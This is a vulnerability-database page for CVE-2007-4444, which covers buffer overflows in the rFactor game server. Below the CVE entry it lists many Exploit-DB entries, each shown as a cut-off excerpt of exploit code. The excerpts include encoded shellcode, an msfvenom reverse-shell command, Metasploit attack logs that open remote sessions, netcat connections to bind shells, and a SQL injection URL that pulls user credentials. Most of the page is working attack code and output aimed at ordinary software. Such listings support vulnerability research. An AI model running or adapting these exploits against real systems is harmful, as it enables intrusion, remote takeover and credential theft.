CVE-2007-4444
published 2007-08-21CVE-2007-4444: Multiple buffer overflows in Image Space rFactor 1.250 and earlier allow remote attackers to execute arbitrary code via a packet with ID (1) 0x80 or (2) 0x88…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.26%
93.6th percentile
Multiple buffer overflows in Image Space rFactor 1.250 and earlier allow remote attackers to execute arbitrary code via a packet with ID (1) 0x80 or (2) 0x88 to UDP port 34297, related to the buffer containing the server version number.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rfactor | rfactor | — | — |
| rfactor | rfactor | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb·2012-06-14
CVE-2007-1195 XM Easy Personal FTP Server 5.30 - Remote Format String Write4
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
exploitdb·2009-09-04
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
---
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)
#meterpreter >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metaspl
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb·2009-09-03
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow
SIDVault 2.0e - Windows Remote Buffer Overflow
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB
Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
exploitdb·2009-03-20
CVE-2007-4370 Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
---
/*
Racer vs 0.5.3 beta 5 Remote Stack Buffer Overflow(C) exploit by fl0 fl0w
Description : Bug found some time ago by n00b (Cheers mate ! :D) ,I wanted to make a more
improved sploit , with lots of targets to chose from , and C yes is better :D.
Tested on Win Xp Pro Sp 3 ; Compile DevC++ 4.9.9.2
Command line arguments : -ip ->the ip of your target default is 127.0.0.1
-port ->default port is 26000
-shellcode ->well guess.. :D
What does the exploit do ?
You can run :Calc.exe, Bind shell on port 4444, Win32 Adduser
I've set the default port 26000 and ip 127.0.0.1 .
How to use ? Method ?
-t 10 -ip 127.0.0.1 -port 26000
Classic buffer overflow , just jump to the payload and done !
It can be exploited using SEH method too.
*/
#include
#i
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
BadBlue 2.72 - PassThru Remote Buffer Overflow
exploitdb·2007-12-24·CVSS 5.0
CVE-2007-6377 [MEDIUM] BadBlue 2.72 - PassThru Remote Buffer Overflow
BadBlue 2.72 - PassThru Remote Buffer Overflow
---
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# https://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
#
# Credit to Luigi Auriemma
# Jacopo Cervini [email protected]
# 22/12/2007
#
#
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: badblue-272-seh.pl \n\n";
exit;
}
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\
Exploit-DB
Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow
exploitdb·2007-12-18
CVE-2007-6478 Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow
Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow
---
/* rosoft-player-expl.c: 2007-12-18:
*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Rosoft Media Player
#include
/**
* Invalid chars: 0x1A 0xA 0xD 0x00
* win32_bind -
* EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
* http://metasploit.com
*/
unsigned char uszShellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
"\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
"\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
"\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
"\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
"\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
"
Exploit-DB
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
exploitdb·2007-10-27
CVE-2007-4880 IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
---
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
Exploit-DB
Eggdrop Server Module Message Handling - Remote Buffer Overflow
exploitdb·2007-10-10
CVE-2007-2807 Eggdrop Server Module Message Handling - Remote Buffer Overflow
Eggdrop Server Module Message Handling - Remote Buffer Overflow
---
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
https://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add \n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\x
Exploit-DB
smbftpd 0.96 - SMBDirList-function Remote Format String
exploitdb·2007-10-01
CVE-2007-5184 smbftpd 0.96 - SMBDirList-function Remote Format String
smbftpd 0.96 - SMBDirList-function Remote Format String
---
/*
* smbftpd 0.96 Proof of concept
* tested with smbftpd 0.96 compiled with gcc 3.3.6
*
* 1. write jumpcode to `BSS`
* mov dx, 0x1234
* pop eax
* cmp ax, dx
* jne $-4
* jmp esp
* 2. overwrite a GOT entry with the addr to `BSS` & send shellcode
*
* jerry:~> ./bleh -h localhost
* [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791
* [+] localhost:21 (user: anonymous pass: )
* [+] PASV
* [+] writing jumpcode
* [+] PASV
* [+] overwriting GOT entry and sending shellcode
* jerry:~> nc localhost 4444
* id
* uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)
*
*
* - Jerry Illikainen
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define GOT 0x080591d8 // GOT entry for chdir
#define
Exploit-DB
gMotor2 Game Engine - Multiple Vulnerabilities
exploitdb·2007-08-18
CVE-2007-4444 gMotor2 Game Engine - Multiple Vulnerabilities
gMotor2 Game Engine - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/25358/info
The gMotor2 game engine is prone to multiple code-execution and denial-of-service vulnerabilities. Four vulnerabilities were reported.
These vulnerabilities may be triggered by malicious client requests to games that use the affected engine, including rFactor. Successful exploits could crash a game server or let remote attackers execute arbitrary code on the computer hosting affected software.
NOTE: This BID originally stated that the vulnerabilities were in the rFactor game. New information shows that the gMotor2 game engine and multiple games that use the engine are vulnerable. This BID was updated to reflect this new information.
https://gitlab.com/exploit-database/exploitdb-bin
Exploit-DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb·2007-08-09
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x
Exploit-DB
Rational Software Hidden Administrator 1.7 - Authentication Bypass
exploitdb·2007-05-19
CVE-2007-2783 Rational Software Hidden Administrator 1.7 - Authentication Bypass
Rational Software Hidden Administrator 1.7 - Authentication Bypass
---
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# https://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h -p -t #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################
Exploit-DB
Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Local Buffer Overflow
exploitdb·2007-04-27
CVE-2007-2366 Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Local Buffer Overflow
Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Local Buffer Overflow
---
/****************************************************************************\
* *
* Photoshop CS2/CS3, Paint Shop Pro 11.20 .PNG File Buffer Overflow *
* *
* Like bitmap files, PNG files can do great things =D. *
* In french: "buffer overflow a gogo!" *
* *
* The generated .PNG file will work for: *
* -Photoshop CS2 *
* -Photoshop CS3 *
* -Photoshop Elements 5.0 *
* -Corel Paint Shop Pro 11.20 *
* *
* This sploit runs calc.exe or bind to port 4444. *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
\****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encod
Exploit-DB
FreshView 7.15 - '.psp' Local Buffer Overflow
exploitdb·2007-04-25
CVE-2007-2283 FreshView 7.15 - '.psp' Local Buffer Overflow
FreshView 7.15 - '.psp' Local Buffer Overflow
---
/*****************************************************************************
* *
* FreshView 7.15 .PSP File Buffer Overflow *
* *
* *
* FreshView is vulnerable to an unspecified buffer overflow when processing *
* a crafted .PSP file. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
* *
* Note: Open that in XnView to see EIP overwritten =D *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4
Exploit-DB
ABC-View Manager 1.42 - '.psp' Local Buffer Overflow
exploitdb·2007-04-25
CVE-2007-2284 ABC-View Manager 1.42 - '.psp' Local Buffer Overflow
ABC-View Manager 1.42 - '.psp' Local Buffer Overflow
---
/*****************************************************************************
* *
* ABC-View Manager 1.42 .PSP File Buffer Overflow *
* *
* *
* ABC-View Manager is vulnerable to an unspecified buffer overflow when *
* processing a crafted .TTF file. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
* *
* Note: Open that in XnView to see EIP overwritten =D *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd
Exploit-DB
Corel Paint Shop Pro Photo 11.20 - '.clp' Local Buffer Overflow
exploitdb·2007-04-23
CVE-2007-2209 Corel Paint Shop Pro Photo 11.20 - '.clp' Local Buffer Overflow
Corel Paint Shop Pro Photo 11.20 - '.clp' Local Buffer Overflow
---
/*****************************************************************************
* *
* Corel Paint Shop Pro Photo v11.20 Unspecified .CLP File Buffer Overflow *
* *
* *
* By opening a specially crafted file, SEH can be overwritten which makes *
* code execution possible. *
* *
* This sploit runs calc.exe or binds to port 4444. *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13
Exploit-DB
ACDSee 9.0 - '.xpm' Local Buffer Overflow
exploitdb·2007-04-22
CVE-2007-2193 ACDSee 9.0 - '.xpm' Local Buffer Overflow
ACDSee 9.0 - '.xpm' Local Buffer Overflow
---
/*****************************************************************************
* ACDSee v9.0 .XPM File Buffer Overflow *
* *
* *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a *
* crafted .XPM file. *
* This exploit runs calc.exe or binds shell to port 4444, and works against *
* ACDSee and ACDSee Quick View. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98"
Exploit-DB
XnView 1.90.3 - '.xpm' Local Buffer Overflow
exploitdb·2007-04-22
CVE-2007-2194 XnView 1.90.3 - '.xpm' Local Buffer Overflow
XnView 1.90.3 - '.xpm' Local Buffer Overflow
---
/*****************************************************************************
* *
* XnView 1.90.3 .XPM File Buffer Overflow *
* *
* *
* XnView is vulnerable to a buffer overflow while processing a crafted XPM *
* File. It fails to check the length of the arguments passed to the defined *
* array which leads to code execution. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\
Exploit-DB
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
exploitdb·2007-04-15
CVE-2007-1748 Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in https://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode +=
Exploit-DB
IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
exploitdb·2007-04-09
CVE-2007-1867 IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
---
/*
IrfanView 3.99 .ANI File Buffer Overflow (Multiple Targets and port bind shell)
Old Target:
Windows XP Sp2 FR
New targets:
Windows XP SP2 Portuguese Call ESP Addr
Windows XP SP2 English Call ESP Addr
Greetz: Ricardo Fiorelli, Marsu (make this possible.. nice job!), Str0ke , Sekure.org guys!
*/
#include
#include
/* win32_exec - EXITFUNC=process Bind TCP port 4444 http://metasploit.com */
char BindShellcode[]=
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c"
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01"
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x03\x2c\x8b\x8
Exploit-DB
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Section : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$sock
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
exploitdb·2007-03-14
CVE-2007-1567 WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x3
Exploit-DB
CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
exploitdb·2007-02-01
CVE-2007-0449 CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
---
#!/usr/bin/python
# Remote exploit for the CA BrightStor Arcserve stack overflow as
# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded
#
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
#
import os
import sys
import socket
import struct
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
exploitdb·2007-01-28
CVE-2007-0449 CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
---
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet
Exploit-DB
